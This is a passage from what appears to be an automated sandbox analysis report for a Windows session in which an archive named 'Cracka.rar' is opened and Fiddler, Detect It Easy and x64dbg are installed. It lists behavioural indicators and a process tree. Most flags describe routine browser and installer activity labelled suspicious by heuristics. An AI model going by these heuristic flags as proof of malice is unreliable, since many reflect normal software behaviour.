fc9fb8186b379d935e70241d2906b77b53d54f76a4fb778f7f469e66158636ef2ba7b81aada5c5d9bd3f5995c4b867e9f844b45b3b5b060878bb31a08900d3e34ae1e59b90c2e199f4dad74eaa1fed79a90c54e8443ef68c2ddfb44aa0a20650e2f326db8b03e4f5be9968a5f3973044cf4625e96741b87e74f7bcac3b123703ee365760e93c2888b6584fb5180cf Fiddler.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3ADE835AAA9EF8A3CAB06EFB817C4FC2BD6895DD TrustCert.exe -
NTFS ADS 4 IoCs
description ioc Process File created C:\Users\Admin\Downloads\pi5.tmp.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\FiddlerSetup.5.0.20245.10105-latest.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\die_win64_portable_3.10_x64.zip:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\snapshot_2024-12-01_15-19.zip:Zone.Identifier firefox.exe -
Suspicious behavior: AddClipboardFormatListener 4 IoCs
pid Process 6000 die.exe 3436 x64dbg.exe 1144 x64dbg.exe 5740 x64dbg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5648 FiddlerSetup.exe 5648 FiddlerSetup.exe 2140 msedge.exe 2140 msedge.exe 4796 msedge.exe 4796 msedge.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe 6920 Fiddler.exe -
Suspicious behavior: GetForegroundWindowSpam 10 IoCs
pid Process 6920 Fiddler.exe 3500 taskmgr.exe 6000 die.exe 5768 firefox.exe 3436 x64dbg.exe 1144 x64dbg.exe 5740 x64dbg.exe 412 rundll32.exe 5796 Fiddler.exe 1928 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 4796 msedge.exe 4796 msedge.exe 4796 msedge.exe 4796 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 1048 7zFM.exe Token: 35 1048 7zFM.exe Token: SeDebugPrivilege 3684 firefox.exe Token: SeDebugPrivilege 3684 firefox.exe Token: SeDebugPrivilege 5648 FiddlerSetup.exe Token: SeDebugPrivilege 5648 FiddlerSetup.exe Token: SeDebugPrivilege 5648 FiddlerSetup.exe Token: SeDebugPrivilege 5648 FiddlerSetup.exe Token: SeDebugPrivilege 5648 FiddlerSetup.exe Token: SeDebugPrivilege 5648 FiddlerSetup.exe Token: SeDebugPrivilege 4796 msedge.exe Token: SeDebugPrivilege 4796 msedge.exe Token: SeDebugPrivilege 3684 firefox.exe Token: SeDebugPrivilege 3684 firefox.exe Token: SeDebugPrivilege 3684 firefox.exe Token: SeDebugPrivilege 6920 Fiddler.exe Token: SeDebugPrivilege 5400 powershell.exe Token: SeIncreaseQuotaPrivilege 5400 powershell.exe Token: SeSecurityPrivilege 5400 powershell.exe Token: SeTakeOwnershipPrivilege 5400 powershell.exe Token: SeLoadDriverPrivilege 5400 powershell.exe Token: SeSystemProfilePrivilege 5400 powershell.exe Token: SeSystemtimePrivilege 5400 powershell.exe Token: SeProfSingleProcessPrivilege 5400 powershell.exe Token: SeIncBasePriorityPrivilege 5400 powershell.exe Token: SeCreatePagefilePrivilege 5400 powershell.exe Token: SeBackupPrivilege 5400 powershell.exe Token: SeRestorePrivilege 5400 powershell.exe Token: SeShutdownPrivilege 5400 powershell.exe Token: SeDebugPrivilege 5400 powershell.exe Token: SeSystemEnvironmentPrivilege 5400 powershell.exe Token: SeRemoteShutdownPrivilege 5400 powershell.exe Token: SeUndockPrivilege 5400 powershell.exe Token: SeManageVolumePrivilege 5400 powershell.exe Token: 33 5400 powershell.exe Token: 34 5400 powershell.exe Token: 35 5400 powershell.exe Token: 36 5400 powershell.exe Token: SeDebugPrivilege 3828 tasklist.exe Token: SeDebugPrivilege 7132 tasklist.exe Token: SeIncreaseQuotaPrivilege 5584 WMIC.exe Token: SeSecurityPrivilege 5584 WMIC.exe Token: SeTakeOwnershipPrivilege 5584 WMIC.exe Token: SeLoadDriverPrivilege 5584 WMIC.exe Token: SeSystemProfilePrivilege 5584 WMIC.exe Token: SeSystemtimePrivilege 5584 WMIC.exe Token: SeProfSingleProcessPrivilege 5584 WMIC.exe Token: SeIncBasePriorityPrivilege 5584 WMIC.exe Token: SeCreatePagefilePrivilege 5584 WMIC.exe Token: SeBackupPrivilege 5584 WMIC.exe Token: SeRestorePrivilege 5584 WMIC.exe Token: SeShutdownPrivilege 5584 WMIC.exe Token: SeDebugPrivilege 5584 WMIC.exe Token: SeSystemEnvironmentPrivilege 5584 WMIC.exe Token: SeRemoteShutdownPrivilege 5584 WMIC.exe Token: SeUndockPrivilege 5584 WMIC.exe Token: SeManageVolumePrivilege 5584 WMIC.exe Token: 33 5584 WMIC.exe Token: 34 5584 WMIC.exe Token: 35 5584 WMIC.exe Token: 36 5584 WMIC.exe Token: SeIncreaseQuotaPrivilege 5584 WMIC.exe Token: SeSecurityPrivilege 5584 WMIC.exe Token: SeTakeOwnershipPrivilege 5584 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1048 7zFM.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 4796 msedge.exe 4796 msedge.exe 4796 msedge.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe 3500 taskmgr.exe -
Suspicious use of SetWindowsHookEx 46 IoCs
pid Process 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 3684 firefox.exe 6620 firefox.exe 6620 firefox.exe 6620 firefox.exe 6620 firefox.exe 6000 die.exe 5336 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 5768 firefox.exe 3436 x64dbg.exe 3436 x64dbg.exe 1144 x64dbg.exe 1144 x64dbg.exe 5740 x64dbg.exe 5740 x64dbg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 952 wrote to memory of 3684 952 firefox.exe 88 PID 952 wrote to memory of 3684 952 firefox.exe 88 PID 952 wrote to memory of 3684 952 firefox.exe 88 PID 952 wrote to memory of 3684 952 firefox.exe 88 PID 952 wrote to memory of 3684 952 firefox.exe 88 PID 952 wrote to memory of 3684 952 firefox.exe 88 PID 952 wrote to memory of 3684 952 firefox.exe 88 PID 952 wrote to memory of 3684 952 firefox.exe 88 PID 952 wrote to memory of 3684 952 firefox.exe 88 PID 952 wrote to memory of 3684 952 firefox.exe 88 PID 952 wrote to memory of 3684 952 firefox.exe 88 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1236 3684 firefox.exe 89 PID 3684 wrote to memory of 1900 3684 firefox.exe 90 PID 3684 wrote to memory of 1900 3684 firefox.exe 90 PID 3684 wrote to memory of 1900 3684 firefox.exe 90 PID 3684 wrote to memory of 1900 3684 firefox.exe 90 PID 3684 wrote to memory of 1900 3684 firefox.exe 90 PID 3684 wrote to memory of 1900 3684 firefox.exe 90 PID 3684 wrote to memory of 1900 3684 firefox.exe 90 PID 3684 wrote to memory of 1900 3684 firefox.exe 90 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Cracka.rar"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1048
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:952 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2012 -parentBuildID 20240401114208 -prefsHandle 1948 -prefMapHandle 1920 -prefsLen 23681 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3b4279f-9087-4895-ba58-65132375c7c3} 3684 "\\.\pipe\gecko-crash-server-pipe.3684" gpu3⤵PID:1236
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2428 -parentBuildID 20240401114208 -prefsHandle 2424 -prefMapHandle 2420 -prefsLen 23717 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {117d760b-26e3-477f-85c0-4e03eaf92c76} 3684 "\\.\pipe\gecko-crash-server-pipe.3684" socket3⤵PID:1900
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3136 -childID 1 -isForBrowser -prefsHandle 3124 -prefMapHandle 3276 -prefsLen 23858 -prefMapSize 244658 -jsInitHandle 1216 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5954f1dc-5135-4956-9c1f-7399e34d4c2b} 3684 "\\.\pipe\gecko-crash-server-pipe.3684" tab3⤵PID:3872
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3948 -childID 2 -isForBrowser -prefsHandle 3944 -prefMapHandle 3940 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 1216 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e225254e-6ef5-44c3-9585-0804fbabd336} 3684 "\\.\pipe\gecko-crash-server-pipe.3684" tab3⤵PID:4720
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4896 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4684 -prefMapHandle 4888 -prefsLen 29091 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {38918019-f4db-42fc-85b7-fc59b22ffc8b} 3684 "\\.\pipe\gecko-crash-server-pipe.3684" utility3⤵
- Checks processor information in registry
PID:1432
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5496 -childID 3 -isForBrowser -prefsHandle 5504 -prefMapHandle 5456 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1216 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c7dbb562-7760-468c-8696-f2e89d8e8cd4} 3684 "\\.\pipe\gecko-crash-server-pipe.3684" tab3⤵PID:2636
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5532 -childID 4 -isForBrowser -prefsHandle 5708 -prefMapHandle 5704 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1216 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {907173fe-5908-4722-b355-e2ead1157195} 3684 "\\.\pipe\gecko-crash-server-pipe.3684" tab3⤵PID:1260
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5892 -childID 5 -isForBrowser -prefsHandle 5812 -prefMapHandle 5816 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1216 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9aead47-9da4-44e3-8e65-4b5623c63751} 3684 "\\.\pipe\gecko-crash-server-pipe.3684" tab3⤵PID:1440
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6448 -childID 6 -isForBrowser -prefsHandle 6440 -prefMapHandle 6436 -prefsLen 27251 -prefMapSize 244658 -jsInitHandle 1216 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e0835c6-fafa-480f-aa21-e8b2ae664c82} 3684 "\\.\pipe\gecko-crash-server-pipe.3684" tab3⤵PID:3844
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4740 -childID 7 -isForBrowser -prefsHandle 6744 -prefMapHandle 6620 -prefsLen 27490 -prefMapSize 244658 -jsInitHandle 1216 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f00eb18-ee22-4aca-be8e-599d793c972c} 3684 "\\.\pipe\gecko-crash-server-pipe.3684" tab3⤵PID:3216
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6844 -childID 8 -isForBrowser -prefsHandle 7112 -prefMapHandle 7108 -prefsLen 27817 -prefMapSize 244658 -jsInitHandle 1216 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c65bd4e1-a376-48dd-9a3f-78c1b86b7521} 3684 "\\.\pipe\gecko-crash-server-pipe.3684" tab3⤵PID:4940
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7260 -childID 9 -isForBrowser -prefsHandle 7268 -prefMapHandle 7272 -prefsLen 27817 -prefMapSize 244658 -jsInitHandle 1216 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e875fe1-dc47-405d-9ebc-4bed9fd8dcb4} 3684 "\\.\pipe\gecko-crash-server-pipe.3684" tab3⤵PID:1104
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7472 -childID 10 -isForBrowser -prefsHandle 7552 -prefMapHandle 7548 -prefsLen 27817 -prefMapSize 244658 -jsInitHandle 1216 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a15d8d1-1b1c-46af-a17f-b5dbbf2c2267} 3684 "\\.\pipe\gecko-crash-server-pipe.3684" tab3⤵PID:5136
-
-
C:\Users\Admin\Downloads\FiddlerSetup.5.0.20245.10105-latest.exe"C:\Users\Admin\Downloads\FiddlerSetup.5.0.20245.10105-latest.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2244 -
C:\Users\Admin\AppData\Local\Temp\nso4B97.tmp\FiddlerSetup.exe"C:\Users\Admin\AppData\Local\Temp\nso4B97.tmp\FiddlerSetup.exe" /D=4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5648 -
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name="FiddlerProxy"5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3276
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="FiddlerProxy" program="C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe" action=allow profile=any dir=in edge=deferuser protocol=tcp description="Permit inbound connections to Fiddler"5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4648
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe"5⤵PID:5196
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 21c -InterruptEvent 0 -NGENProcess 20c -Pipe 218 -Comment "NGen Worker Process"6⤵PID:704
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 28c -InterruptEvent 0 -NGENProcess 2a0 -Pipe 288 -Comment "NGen Worker Process"6⤵PID:1620
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c4 -InterruptEvent 0 -NGENProcess 290 -Pipe 2a4 -Comment "NGen Worker Process"6⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:4040
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b0 -InterruptEvent 0 -NGENProcess 2ec -Pipe 2c4 -Comment "NGen Worker Process"6⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:4584
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2dc -InterruptEvent 0 -NGENProcess 2e0 -Pipe 294 -Comment "NGen Worker Process"6⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:6088
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 300 -InterruptEvent 0 -NGENProcess 318 -Pipe 2f8 -Comment "NGen Worker Process"6⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:5000
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 318 -InterruptEvent 0 -NGENProcess 2dc -Pipe 300 -Comment "NGen Worker Process"6⤵
- Loads dropped DLL
PID:6128
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 320 -InterruptEvent 0 -NGENProcess 2fc -Pipe 2f4 -Comment "NGen Worker Process"6⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:6232
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2e0 -InterruptEvent 0 -NGENProcess 318 -Pipe 2a0 -Comment "NGen Worker Process"6⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:6400
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 310 -InterruptEvent 0 -NGENProcess 298 -Pipe 2ec -Comment "NGen Worker Process"6⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:6540
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 328 -InterruptEvent 0 -NGENProcess 2b0 -Pipe 2dc -Comment "NGen Worker Process"6⤵
- Drops file in Windows directory
PID:6484
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 30c -InterruptEvent 0 -NGENProcess 304 -Pipe 2ec -Comment "NGen Worker Process"6⤵
- Drops file in Windows directory
PID:2624
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 290 -InterruptEvent 0 -NGENProcess 30c -Pipe 298 -Comment "NGen Worker Process"6⤵
- Drops file in Windows directory
PID:3284
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 310 -InterruptEvent 0 -NGENProcess 2e4 -Pipe 2c8 -Comment "NGen Worker Process"6⤵
- Drops file in Windows directory
PID:7100
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 32c -InterruptEvent 0 -NGENProcess 310 -Pipe 30c -Comment "NGen Worker Process"6⤵
- Drops file in Windows directory
PID:6496
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 328 -InterruptEvent 0 -NGENProcess 32c -Pipe 31c -Comment "NGen Worker Process"6⤵
- Drops file in Windows directory
PID:7144
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Users\Admin\AppData\Local\Programs\Fiddler\EnableLoopback.exe"5⤵PID:3732
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 210 -InterruptEvent 0 -NGENProcess 204 -Pipe 20c -Comment "NGen Worker Process"6⤵PID:6888
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a4 -InterruptEvent 0 -NGENProcess 28c -Pipe 294 -Comment "NGen Worker Process"6⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:3408
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2cc -InterruptEvent 0 -NGENProcess 2c0 -Pipe 2c8 -Comment "NGen Worker Process"6⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:6796
-
-
